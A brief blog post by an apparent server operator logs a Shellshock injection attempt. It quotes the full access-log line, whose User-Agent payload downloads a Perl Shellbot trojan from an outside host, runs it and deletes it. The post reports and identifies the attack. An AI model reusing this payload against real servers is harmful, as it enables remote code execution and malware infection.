Sonntag, 3. Mai 2015

Trojan.Perl.Shellbot-2 injection

Last night I had another 30 lines of tried shell code injection and the download of malware.

194.176.119.86 - - [02/May/2015:21:14:23 +0200] "GET /cgi-bin/env.cgi HTTP/1.1" 404 471 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://psychoid.us/non -O /tmp/b.pl;curl -O /tmp/b.pl http://psychoid.us/non;perl /tmp/b.pl;rm -rf /tmp/b.pl*\");'"
The file which should be downloaded is a  Trojan.Perl.Shellbot-2 according to clamAV.